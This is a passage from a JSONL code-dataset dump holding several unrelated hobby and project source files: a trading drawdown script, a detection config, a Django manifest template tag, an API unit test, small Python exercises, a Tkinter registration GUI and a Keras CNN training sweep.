left[l]\n l += 1\n k += 1\n else:\n a_list[k] = right[r]\n r += 1\n k += 1\n\n # ---Sc2 (some sorted): a_list[:k] is sorted when r = len(right), which means all elements in right is sorted and placed in a_list\n # and k = l + r\n while l < len(left):\n a_list[k] = left[l]\n l += 1\n k += 1\n\n # ---Sc3 (some sorted): a_list[:k] is sorted when l = len(left), which means all elements in left is sorted and placed in a_list\n # and k = l + r\n while r < len(right):\n a_list[k] = right[r]\n r += 1\n k += 1\n\n # ---S4 (Complement): a_list is sorted\n return_list = a_list.copy()\n return return_list\n\n\n\n ################## main ##################\n def main(self):\n L_mdd = self.do_multithreading()\n a_list = self.merge_sort(L_mdd, col=2)\n print(\" Sorted Max Drawdown: \")\n for i, res in enumerate(a_list):\n # pdb.set_trace()\n print(f\"---------------------- No.{i + 1} -------------------------------\")\n print(f\"The max drawdown of {res[-1]} is \" + \"{:.2%}\".format(res[2]))\n print(f\"The max drawdown starts on {str(self.dict_raw_data[res[-1]].index[res[0]])}\")\n print(f\"The max drawdown ends on {str(self.dict_raw_data[res[-1]].index[res[1]])}\")\n print(f\"The max profit can be \" + \"{:.2%}\".format(res[3]))\n print(f\"The max profit with transaction fee $\" + str(self.fee) + \" can be \" + \"{:.2%}\".format(res[4]))\n # self.dict_raw_data[res[3]].plot(color='grey', figsize=(8,4))\n # plt.title(res[3])\n # plt.ylabel(\"Adj Close\")\n #\n # plt.scatter(self.dict_raw_data[res[3]].index[res[0]], self.dict_raw_data[res[3]][res[0]], color='red')\n # plt.scatter(self.dict_raw_data[res[3]].index[res[1]], self.dict_raw_data[res[3]][res[1]], color='red')\n # plt.show()\n\n\nif __name__ == \"__main__\":\n L_symbol = [\"TSLA\", \"FB\", \"NFLX\", \"AMZN\", \"GOOG\"]\n TA = TradeAssistant(L_symbol=L_symbol, start=dt.datetime(2018, 1, 1), end=dt.datetime(2020, 7, 1))\n TA.main()\n","sub_path":"Financial-Application-Python/TradeAssistant.py","file_name":"TradeAssistant.py","file_ext":"py","file_size_in_byte":15197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582912821","text":"from DOTA_configs.NWPU_VHR_10.a_base_config import *\n\n_base_ = [\n '../_base_/models/faster_rcnn_r50_fpn.py',\n dataset_config,\n '../_base_/schedules/schedule_2x_rs.py',\n '../_base_/default_runtime.py'\n]\n\n# model 
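# ---- Editor's aside (hedged; sample rows are invented) ----
# The merge_sort method above promises a stable ascending order on column `col`;
# its output can be cross-checked against Python's built-in stable sort.
from operator import itemgetter

_rows = [["b", 2, -0.3], ["a", 1, -0.7], ["c", 3, -0.5]]
assert sorted(_rows, key=itemgetter(2)) == [["a", 1, -0.7], ["c", 3, -0.5], ["b", 2, -0.3]]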
settings\nmodel = dict(\n    roi_head=dict(\n        bbox_head=dict(\n            num_classes=num_classes)))\n# training and testing settings\n\ntest_cfg = dict(\n    rpn=dict(\n        nms_across_levels=False,\n        nms_pre=6000,\n        nms_post=1000,\n        max_num=1000,\n        nms_thr=0.7,\n        min_bbox_size=0),\n    rcnn=dict(\n        score_thr=0.05,\n        nms=dict(type='nms', iou_threshold=0.5),\n        max_per_img=max_bbox_per_img))","sub_path":"DOTA_configs/NWPU_VHR_10/faster_rcnn_r50_fpn_2x.py","file_name":"faster_rcnn_r50_fpn_2x.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"603880073","text":"#!/usr/bin/python\n# written by: atholcomb\n# car_rental.py\n# Offers a fixed list of cars for rent\n# \n# Module has 1 function\n# car_to_rent()\n\ncars_list = ['car1', 'car2', 'car3']\n\ndef car_to_rent():\n    for index in cars_list:\n        print(index[-1])\n    # cast the reply to int so the comparisons below can ever be true\n    select = int(input(\"Car select 1-3: \"))\n    if select == 1:\n        print(\"You selected Subaru!\")\n    if select == 2:\n        print(\"You selected Kia!\")\n    if select == 3:\n        print(\"You selected Audi!\")\n\ncar_to_rent()\n","sub_path":"classes/car_rental.py","file_name":"car_rental.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"39452686","text":"import json\nimport os\nimport fnmatch\n\nfrom django import template\nfrom django.templatetags.static import StaticNode\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.utils.html import conditional_escape\nfrom django.core.validators import URLValidator\nfrom django.core.exceptions import ValidationError\n\n\nfrom manifest_loader.exceptions import WebpackManifestNotFound\n\n\nregister = template.Library()\n\nAPP_SETTINGS = {\n    'output_dir': None,\n    'manifest_file': 'manifest.json',\n    'cache': False\n}\n\nif hasattr(settings, 'MANIFEST_LOADER'):\n    APP_SETTINGS.update(settings.MANIFEST_LOADER)\n\n\n@register.tag('manifest')\ndef do_manifest(parser, token):\n    return ManifestNode(token)\n\n\n@register.tag('manifest_match')\ndef do_manifest_match(parser, token):\n    return ManifestMatchNode(token)\n\n\nclass ManifestNode(template.Node):\n    def __init__(self, token):\n        bits = token.split_contents()\n        if len(bits) < 2:\n            raise template.TemplateSyntaxError(\n                \"'%s' takes one argument (name of file)\" % bits[0])\n        self.bits = bits\n\n    def render(self, context):\n        manifest_key = get_value(self.bits[1], context)\n        manifest = get_manifest()\n        manifest_value = manifest.get(manifest_key, manifest_key)\n        return make_url(manifest_value, context)\n\n\nclass ManifestMatchNode(template.Node):\n    def __init__(self, token):\n        self.bits = token.split_contents()\n        if len(self.bits) < 3:\n            raise template.TemplateSyntaxError(\n                \"'%s' takes two arguments (pattern to match and string to \"\n                \"insert into)\" % self.bits[0]\n            )\n\n    def render(self, context):\n        urls = []\n        search_string = get_value(self.bits[1], context)\n        output_tag = get_value(self.bits[2], context)\n\n        manifest = get_manifest()\n\n        matched_files = [file for file in manifest.keys() if\n                         fnmatch.fnmatch(file, search_string)]\n        mapped_files = [manifest.get(file) for file in matched_files]\n\n        for file in mapped_files:\n            url = make_url(file, context)\n            urls.append(url)\n        output_tags = [output_tag.format(match=file) for file in urls]\n        return '\\n'.join(output_tags)\n\n\ndef get_manifest():\n    cached_manifest = cache.get('webpack_manifest')\n    if APP_SETTINGS['cache'] and cached_manifest:\n        return 
cached_manifest\n\n if APP_SETTINGS['output_dir']:\n manifest_path = os.path.join(APP_SETTINGS['output_dir'],\n APP_SETTINGS['manifest_file'])\n else:\n manifest_path = find_manifest_path()\n\n try:\n with open(manifest_path) as manifest_file:\n data = json.load(manifest_file)\n except FileNotFoundError:\n raise WebpackManifestNotFound(manifest_path)\n\n if APP_SETTINGS['cache']:\n cache.set('webpack_manifest', data)\n\n return data\n\n\ndef find_manifest_path():\n static_dirs = settings.STATICFILES_DIRS\n if len(static_dirs) == 1:\n return os.path.join(static_dirs[0], APP_SETTINGS['manifest_file'])\n for static_dir in static_dirs:\n manifest_path = os.path.join(static_dir, APP_SETTINGS['manifest_file'])\n if os.path.isfile(manifest_path):\n return manifest_path\n raise WebpackManifestNotFound('settings.STATICFILES_DIRS')\n\n\ndef is_quoted_string(string):\n if len(string) < 2:\n return False\n return string[0] == string[-1] and string[0] in ('\"', \"'\")\n\n\ndef get_value(string, context):\n if is_quoted_string(string):\n return string[1:-1]\n return context.get(string, '')\n\n\ndef is_url(potential_url):\n validate = URLValidator()\n try:\n validate(potential_url)\n return True\n except ValidationError:\n return False\n\n\ndef make_url(manifest_value, context):\n if is_url(manifest_value):\n url = manifest_value\n else:\n url = StaticNode.handle_simple(manifest_value)\n if context.autoescape:\n url = conditional_escape(url)\n return url\n","sub_path":"manifest_loader/templatetags/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379337970","text":"\nimport unittest\nfrom json import *\nimport json\nimport paramunittest\nimport readConfig as readConfig\nfrom comm.Log import MyLog\nfrom comm import common\nfrom comm import configHttp as ConfigHttp\nfrom comm import businessCommon\n\nxls = common.get_xls(\"pc.xlsx\", \"患者基本信息保存\") # excel取值\n\nReadConfig = readConfig.ReadConfig()\nconfigHttp = ConfigHttp.ConfigHttp()\ninfo = {}\n\n\n@paramunittest.parametrized(*xls)\nclass saveBaseinfo(unittest.TestCase):\n def setParameters(self, case_name, url, method,nativeProvinceId,nativeProvince,nativeCityId,nativeCity,nativeDistrictId,nativeDistrict,birthplaceProvinceId,birthplaceProvince,birthplaceCityId,birthplaceCity,birthplaceDistrictId,birthplaceDistrict,patientId,id,address,telephone,socialId,socialAddress,nation,isMarriage,homeAddress,workplace,spouseStatus,childrenStatus,fertility,marriageAge,isSmoke,isDrink,isNarcotics,parentStatus,siblingsStatus,isInfection,isHeredopathia, msg, ):\n self.case_name = str(case_name)\n self.url = str(url)\n self.method = str(method)\n self.msg = str(msg)\n self.return_json = None # 返回值\n self.info = None # json结果\n self.nativeProvinceId = str(nativeProvinceId)\n self.nativeProvince = str(nativeProvince)\n self.nativeCityId = str(nativeCityId)\n self.nativeCity = str(nativeCity)\n self.nativeDistrictId = str(nativeDistrictId)\n self.nativeDistrict = str(nativeDistrict)\n self.birthplaceProvinceId = str(birthplaceProvinceId)\n self.birthplaceProvince = str(birthplaceProvince)\n self.birthplaceCityId = str(birthplaceCityId)\n self.birthplaceCity = str(birthplaceCity)\n self.birthplaceDistrictId = str(birthplaceDistrictId)\n self.birthplaceDistrict = str(birthplaceDistrict)\n self.address = str(address)\n #self.telephone = str(telephone)\n self.socialId = str(socialId)\n self.socialAddress = str(socialAddress)\n self.nation = 
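# ---- Editor's aside (hedged; the manifest contents are invented sample data) ----
# What the manifest_match tag above computes, with the Django machinery stripped
# out: fnmatch the manifest keys, then format each mapped file into the tag.
import fnmatch

_manifest = {"main.js": "main.8f2c1.js", "vendor.js": "vendor.11aa0.js", "style.css": "style.9b7d2.css"}
_pattern, _tag = "*.js", '<script src="/static/{match}"></script>'
print("\n".join(_tag.format(match=_manifest[k]) for k in _manifest if fnmatch.fnmatch(k, _pattern)))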
str(nation)\n self.isMarriage = str(isMarriage)\n self.homeAddress = str(homeAddress)\n self.workplace = str(workplace)\n self.spouseStatus = str(spouseStatus)\n self.childrenStatus = str(childrenStatus)\n self.fertility = str(fertility)\n self.marriageAge = str(marriageAge)\n self.isSmoke = str(isSmoke)\n self.isDrink = str(isDrink)\n self.isNarcotics = str(isNarcotics)\n self.parentStatus = str(parentStatus)\n self.siblingsStatus = str(siblingsStatus)\n self.isInfection = str(isInfection)\n self.isHeredopathia = str(isHeredopathia)\n\n def description(self):\n self.case_name\n\n def setUp(self):\n self.log = MyLog.get_log()\n self.logger = self.log.get_logger()\n print(self.case_name + \"测试开始前准备\") # log启动\n\n def testsaveBaseinfo(self):\n # 拼接url,也可以从excel中获取\n # self.url = comm.get_url_from_xml('login')\n configHttp.set_pcurl(self.url)\n print(\"第1步:设置url \" + self.url)\n\n # 设置参数\n patientId = ReadConfig.get_patient('patientid')\n baseinfo_id = ReadConfig.get_patient('baseinfo_id')\n telephone = ReadConfig.get_patient('mobile')\n paramJson = {\"nativeProvinceId\":self.nativeProvinceId,\n \"nativeProvince\":self.nativeProvince,\n \"nativeCityId\":self.nativeCityId,\n \"nativeCity\":self.nativeCity,\n \"nativeDistrictId\":self.nativeDistrictId,\n \"nativeDistrict\":self.nativeDistrict,\n \"birthplaceProvinceId\":self.birthplaceProvinceId,\n \"birthplaceProvince\":self.birthplaceProvince,\n \"birthplaceCityId\":self.birthplaceCityId,\n \"birthplaceCity\":self.birthplaceCity,\n \"birthplaceDistrictId\":self.birthplaceDistrictId,\n \"birthplaceDistrict\":self.birthplaceDistrict,\n \"patientId\":patientId,\n \"id\":baseinfo_id,\n \"address\":self.address,\n \"telephone\":telephone,\n \"socialId\":self.socialId,\n \"socialAddress\":self.socialAddress,\n \"nation\":self.nation,\n \"isMarriage\":self.isMarriage,\n \"homeAddress\":self.homeAddress,\n \"workplace\":self.workplace,\n \"spouseStatus\":self.spouseStatus,\n \"childrenStatus\":self.childrenStatus,\n \"fertility\":self.fertility,\n \"marriageAge\":self.marriageAge,\n \"isSmoke\":self.isSmoke,\n \"isDrink\":self.isDrink,\n \"isNarcotics\":self.isNarcotics,\n \"parentStatus\":self.parentStatus,\n \"siblingsStatus\":self.siblingsStatus,\n \"isInfection\":self.isInfection,\n \"isHeredopathia\":self.isHeredopathia\n }\n data = {\n 'paramJson': str(paramJson)\n }\n\n configHttp.set_data(data)\n print(\"第2步:设置发送请求的参数\")\n print(data)\n\n # 测试接口\n self.return_json = configHttp.post()\n method = self.method\n print(\"第3步:发送请求\\n\\t\\t请求方法:\" + method)\n\n # 校验结果\n self.checkResult()\n print(\"第4步:检查结果\")\n\n def tearDown(self):\n info = self.info\n # 把casename,url,返回值传入log打印\n self.log.build_case_line(self.case_name, self.url, self.return_json.text)\n\n print(\"测试结束,输出log完结\\n\\n\")\n\n # 断言\n def checkResult(self):\n self.info = self.return_json.json()\n # 显示返回结果\n common.show_return_msg(self.return_json)\n self.assertEqual(self.return_json.status_code, 200)\n #self.assertEqual(self.info['responseObject']['responseMessage'], self.msg)\n self.assertEqual(self.info['responseObject']['responseStatus'],True )\n\n#\n# if __name__ == '__main__':\n# unittest.main()\n\n\n\n\n","sub_path":"testCase/pc/Case/saveBaseinfo.py","file_name":"saveBaseinfo.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649151922","text":"class Restaurant:\n def __init__(self, name, type):\n try:\n r_name = name + '_고객서빙현황로그.txt'\n file = open(r_name, 'r')\n file_number = 
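# ---- Editor's note on the saveBaseinfo test above (hedged; field values are placeholders) ----
# str(paramJson) serializes the dict with Python repr (single quotes), which strict
# JSON consumers reject; json.dumps is the safer construction.
import json

_paramJson = {"nation": "Han", "isMarriage": "1"}
_data = {"paramJson": json.dumps(_paramJson, ensure_ascii=False)}
print(_data["paramJson"])  # {"nation": "Han", "isMarriage": "1"}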
file.read()\n self.todays_customer = int(file_number)\n file.close()\n except:\n self.todays_customer = 0\n finally:\n self.restauran_name = name\n self.cuisine_type = type\n self.number_served = 0\n\n def describe_restaurant(self):\n print(\"\\n저희레스토랑 명칭은 %s 이고 %s 전문점입니다\" % (self.restauran_name, self.cuisine_type))\n\n def open_restaurant(self):\n print(\"저희 %s 레스토랑 오픈했습니다. 어서오세요\" %self.restauran_name)\n\n def reset_number_served(self):\n check = int(input(\"초기화 옵션 (전체: 1, 당일: 2): \"))\n if check == 1:\n print(\"전체 손님 카운딩을 0으로 초기화 하였습니다\")\n self.todays_customer = 0\n elif check == 2:\n print('당일손님 카운팅을 0으로 초기화 하였습니다.')\n self.todays_customer += self.number_served\n self.number_served = 0\n\n def increment_number_served(self, number):\n print('손님 %s명 들어오셨습니다. 자리를 안내해 드리겠습니다.' % number)\n self.number_served += number\n\n def check_customer_number(self):\n check = int(input(\"누적 고객확인 (전체: 1, 당일: 2): \"))\n if check == 1:\n print(\"전체 손님 총 %d명 손님께서 오셨습니다.\" % self.todays_customer)\n elif check == 2:\n print('당일 손님 %d명 손님께서 오셨습니다.' % self.number_served)\n\n def __del__(self):\n print(self.restauran_name,\"레스토랑 문 닫습니다\")\n self.todays_customer += self.number_served\n num = str(self.todays_customer)\n try:\n r_name = self.restauran_name+'_고객서빙현황로그.txt'\n file = open(r_name, 'w')\n file.write(num)\n file.close()\n except:\n pass\n\nname, type = input(\"레스토랑 이름과 요리 종류를 선택하세요.(공백으로 구분) : \").split()\ncafe = Restaurant(name, type)\ncafe.describe_restaurant()\nopen_close = input(\"레스토랑을 오픈하시겠습니까? (y/n): \")\nif open_close == 'y':\n cafe.open_restaurant()\n while True:\n input_number = input('\\n어서오세요. 몇명이십니까?(초기화:0입력,종료:-1,누적고객 확인:p) : ')\n if input_number == '-1':\n del cafe\n break\n elif input_number == '0':\n cafe.reset_number_served()\n elif input_number == 'p':\n cafe.check_customer_number()\n else:\n cafe.increment_number_served(int(input_number))\n","sub_path":"01_Jump_to_python/5_APP/Exer/cafe_q6.py","file_name":"cafe_q6.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"637872166","text":"from tkinter import*\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\nroot=Tk()\n \n \nclass MainWindow:\n #para widget ng mainform\n def __init__(self,root,*args,**kwargs):\n \n self.root=root\n self.root.title(\"RFID SYSTEM\")\n self.root.geometry(\"1200x700+200+70\")\n self.root.configure(bg=\"#006600\")\n self.root.resizable(False,False)\n\n #para sa background image\n self.image=ImageTk.PhotoImage(file=\"background_win.jpg\")\n self.label=Label(self.root,image=self.image)\n self.label.place(x=0,y=0)\n \n \n\n \n #Function for Main button. 
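# ---- Editor's aside on the Restaurant class above (hedged; the file suffix is illustrative) ----
# Persisting the visitor counter from __del__ is fragile, since finalizers are not
# guaranteed to run at interpreter shutdown; an explicit save is safer.
def _save_customer_count(restaurant_name, total):
    with open(restaurant_name + '_count_log.txt', 'w', encoding='utf-8') as f:
        f.write(str(total))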
para mapunta sa front ung Frame\n def clicked_home():\n self.frame_home.lift()\n \n \n ###Para sa Employee Frame##### \n def clicked_emp():\n self.frame_emp.lift()\n #Mga label sa pag insert ng Data\n self.head_label=Label(self.frame_emp,text=\"Register Employee Information\",\n font=(\"Andalus\",24,'bold'),fg=\"white\",bg=\"#339900\",borderwidth=10)\n self.head_label.place(x=0,y=20,width=880)\n \n self.name_label=Label(self.frame_emp,text=\"First Name\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.name_label.place(x=20,y=100)\n \n self.mname_label=Label(self.frame_emp,text=\"Middle Name\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.mname_label.place(x=20,y=185)\n \n self.lname_label=Label(self.frame_emp,text=\"Last Name\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.lname_label.place(x=20,y=270)\n\n self.gender_label=Label(self.frame_emp,text=\"Sex\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.gender_label.place(x=20,y=350)\n\n self.bdate_label=Label(self.frame_emp,text=\"Birth Date\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.bdate_label.place(x=20,y=430)\n\n self.address_label=Label(self.frame_emp,text=\"Address\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.address_label.place(x=20,y=510)\n\n #label sa right side ng employee frame\n self.department_label=Label(self.frame_emp,text=\"Department\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.department_label.place(x=350,y=95)\n\n self.position_label=Label(self.frame_emp,text=\"Position\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.position_label.place(x=350,y=181)\n\n self.Salary_label=Label(self.frame_emp,text=\"Salary Grade\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.Salary_label.place(x=350,y=265)\n\n self.email_label=Label(self.frame_emp,text=\"Email Address\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.email_label.place(x=350,y=350)\n\n self.contact_label=Label(self.frame_emp,text=\"Contact Details\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.contact_label.place(x=350,y=435)\n\n self.picbox_label=Label(self.frame_emp,text=\"\",bg=\"darkgreen\")\n self.picbox_label.place(x=680,y=125, width=130,height=130)\n \n\n #Mga Entry box para sa pag insert\n self.name_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.name_entry.place(x=20,y=135,width=250)\n\n self.mname_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.mname_entry.place(x=20,y=220,width=250)\n\n self.lname_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.lname_entry.place(x=20,y=305,width=250)\n\n self.birthdate_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.birthdate_entry.place(x=20,y=465,width=250)\n\n self.address_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.address_entry.place(x=20,y=550,width=250)\n\n #entry box for employee registration right side\n self.email_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.email_entry.place(x=350,y=382,width=250)\n\n self.email_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.email_entry.place(x=350,y=463,width=250)\n\n #combo box for department options\n options_dep = [\n \"\",\n \"SICS\",\n \"SED\",\n \"SENG\"\n ]\n self.dep_cbox= ttk.Combobox(self.frame_emp,value=options_dep)\n self.dep_cbox.current(0)\n self.dep_cbox.place(x=350,y=131,width=250,height=31)\n \n #combo box for positions options\n options_position = [\n \"\",\n \"Support Staff\",\n \"College Lecturer\",\n \"Instructor I\"\n ]\n 
self.position_cbox= ttk.Combobox(self.frame_emp,value=options_position)\n self.position_cbox.current(0)\n self.position_cbox.place(x=350,y=216,width=250,height=31)\n\n #combo box for salary Grade\n options_salaryg = [\n \"\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\n \"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\"\n ]\n self.salaryg_cbox= ttk.Combobox(self.frame_emp,value=options_salaryg)\n self.salaryg_cbox.current(0)\n self.salaryg_cbox.place(x=350,y=302,width=250,height=31)\n\n #combo box for department options\n options_gender = [\n \"\",\"MALE\",\n \"FEMALE\"\n ]\n self.gender_cbox= ttk.Combobox(self.frame_emp,value=options_gender)\n self.gender_cbox.current(0)\n self.gender_cbox.place(x=20,y=385,width=250,height=31)\n\n \n \n \n\n #Register button for the employee registration\n self.btn_save = Button(self.frame_emp, text=\"Register\",borderwidth=3,relief=GROOVE,activebackground=\"#0B0F08\",\n activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'),command=clicked_emp)\n self.btn_save.place(x=20,y=610,width=250,height=50)\n\n\n def clicked_dep():\n self.frame_dep.lift()\n def clicked_pos():\n self.frame_pos.lift()\n \n \n #Container for Main button example: Home,Employee etc.\n self.canvas = Canvas(self.root)\n self.canvas.place(x=10,y=10,width=300,height=680)\n #ito ung sa image na png\n \n self.image1=ImageTk.PhotoImage(file=\"msclogo1.png\")\n self.label1=Label(self.canvas,image=self.image1,borderwidth=10)\n self.label1.place(x=75,y=5)\n\n\n #Home button\n self.Home = Button(self.canvas, text=\"HOME\",borderwidth=5,relief=GROOVE, activebackground=\"#0B0F08\",\n activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'),command=clicked_home)\n self.Home.place(x=10,y=150,width=280,height=60)\n \n \n \n #employee button\n self.employee = Button(self.canvas, text=\"EMPLOYEE\",borderwidth=5,relief=GROOVE,activebackground=\"#0B0F08\",\n activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'),command=clicked_emp)\n self.employee.place(x=10,y=210,width=280,height=60)\n \n\n #employee button\n self.department = Button(self.canvas, text=\"DEPARTMENT\",borderwidth=5,relief=GROOVE,\n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold')\n ,command=clicked_dep)\n self.department.place(x=10,y=270,width=280,height=60)\n\n #employee button\n self.post = Button(self.canvas, text=\"POSITION\",borderwidth=5,relief=GROOVE, \n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold')\n ,command=clicked_pos)\n self.post.place(x=10,y=330,width=280,height=60)\n\n #employee button\n self.settings = Button(self.canvas, text=\"SETTINGS\",borderwidth=5,relief=GROOVE,\n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'))\n self.settings.place(x=10,y=390,width=280,height=60)\n\n #employee button \n self.event = Button(self.canvas, text=\"EVENT\",borderwidth=5,relief=GROOVE,\n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'))\n self.event.place(x=10,y=450,width=280,height=60)\n\n #employee button\n self.employee = Button(self.canvas, text=\"STUDENT\",borderwidth=5,relief=GROOVE, activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'))\n self.employee.place(x=10,y=510,width=280,height=60)\n\n \n #####Frame para sa Main Button#####\n #frame for 
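# ---- Editor's aside (hedged, standalone; widget names and colors are invented) ----
# The clicked_* handlers above switch screens by calling lift() on stacked,
# same-sized frames; this is the pattern in miniature.
import tkinter as tk

_root = tk.Tk()
_container = tk.Frame(_root, width=200, height=120)
_container.pack(fill="both", expand=True)
_frames = {n: tk.Frame(_container, bg=c) for n, c in (("home", "green"), ("employee", "yellow"))}
for _f in _frames.values():
    _f.place(x=0, y=0, relwidth=1, relheight=1)
tk.Button(_root, text="HOME", command=_frames["home"].lift).pack(side="left")
tk.Button(_root, text="EMPLOYEE", command=_frames["employee"].lift).pack(side="left")
# _root.mainloop()  # left commented out so the sketch does not block when run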
position info\n self.frame_pos = Frame(self.root,borderwidth=10,bg=\"red\")\n self.frame_pos.place(x=320,y=10,width=870,height=680)\n #frame for department info\n self.frame_dep = Frame(self.root,borderwidth=10,bg=\"yellow\")\n self.frame_dep.place(x=320,y=10,width=870,height=680)\n #frame for employee info\n self.frame_emp = Frame(self.root)\n self.frame_emp.place(x=320,y=10,width=870,height=680)\n #frame for home info\n self.frame_home = Frame(self.root)\n self.frame_home.place(x=320,y=10,width=870,height=680)\n\n \n \n\n \n \n\n \n\n\nmain=MainWindow(root)\nroot.mainloop()","sub_path":"Mainwindow.py","file_name":"Mainwindow.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"383994917","text":"from silence_tensorflow import silence_tensorflow\n\nsilence_tensorflow()\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nimport numpy as np\nfrom tensorflow.keras import callbacks\nfrom tensorflow.keras.callbacks import TensorBoard, CSVLogger\nimport GPU_RESET\nimport shutil\nimport os\nimport datetime\nfrom time import *\n\n# from time import ctime, time\nGPU_RESET.reset_keras()\n\n########## VIEW RESULTS : tensorboard --logdir=logs/. ######### tensorboard --logdir=models/. ######################\n\nfdirs = ['F:/### Sanabil Dissertation/Image Dataset/Blobs/Learning/Train',\n 'F:/### Sanabil Dissertation/Image Dataset/Crack/Learning/Train',\n 'F:/### Sanabil Dissertation/Image Dataset/Burns/Learning/Train']\n\n# fdirs = ['F:/### Sanabil Dissertation/Image Dataset/BMega/Learning/Train',\n# 'F:/### Sanabil Dissertation/Image Dataset/BMedm/Learning/Train']\n\nNumpyData = 'F:/### Sanabil Dissertation/Disso_Scripts/Main_Code/NumpyData'\n\nif os.path.isdir('models/') == True:\n shutil.rmtree('models/')\n os.makedirs('models')\nelse:\n os.makedirs('models')\n\nfor fdir in fdirs:\n input_X = f'{NumpyData}' + '/X-Data-' + f'{fdir[-20:-15]}.npy'\n input_y = f'{NumpyData}' + '/y-Data-' + f'{fdir[-20:-15]}.npy'\n\n print(input_X)\n print(input_y)\n\n X = np.load(input_X)\n y = np.load(input_y)\n X = X / 255.0\n\n EPOCHS = 10\n\n dense_layers = [0, 1, 2]\n layer_sizes = [16, 32, 64, 128]\n conv_layers = [1, 2, 3]\n optimlist = ['adam', 'SGD', 'RMSprop']\n #\n # dense_layers = [1]\n # layer_sizes = [32]\n # conv_layers = [1,2]\n # optimlist = ['adam']\n\n for dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n for optimchoice in optimlist:\n GPU_RESET.reset_keras()\n sleep(5)\n t = time()\n ctime(t)\n datagen = 'Mon Mar 29 20_35_01 2021'\n # NAME = \"{}-{}-conv-{}-nodes-{}-dense-{}-optimizer-{}-epochs-{}\".format(fdir[-20:-15],conv_layer, layer_size, dense_layer, optimchoice, EPOCHS, str(ctime(t)).replace(\":\",\"_\"))\n NAME = \"{}-{}-conv-{}-nodes-{}-dense-{}-optimizer-{}-epochs-{}\".format(fdir[-20:-15], conv_layer, layer_size, dense_layer, optimchoice, EPOCHS, datagen)\n\n tensorboard = TensorBoard(log_dir=\"models/{}/{}.model\".format(fdir[-20:-15], NAME))\n csv_logger = CSVLogger('./models/' + f'{fdir[-20:-15]}/' + f'{NAME}.model/' + f'{NAME}.log', append=True)\n\n print(NAME)\n\n model = Sequential()\n\n model.add(Conv2D(layer_size, (5, 5), input_shape=X.shape[1:]))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (3, 3)))\n 
model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n\n for l in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(0.8))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n metriclist = ['accuracy', 'mean_absolute_error', 'mean_absolute_percentage_error']\n checkpoint_filepath = \"models/{}/{}.model\".format(fdir[-20:-15], NAME)\n model_checkpoint_callback = callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n save_weights_only=False,\n metric=metriclist,\n mode='auto',\n save_best_only=False)\n\n model.compile(loss='binary_crossentropy',\n optimizer=optimchoice,\n metrics=metriclist,\n )\n\n model.fit(X, y,\n batch_size=64,\n epochs=EPOCHS,\n validation_split=0.1,\n callbacks=[tensorboard, model_checkpoint_callback, csv_logger])\n\n model.save(\"models/{}/{}.model\".format(fdir[-20:-15], NAME))\n # 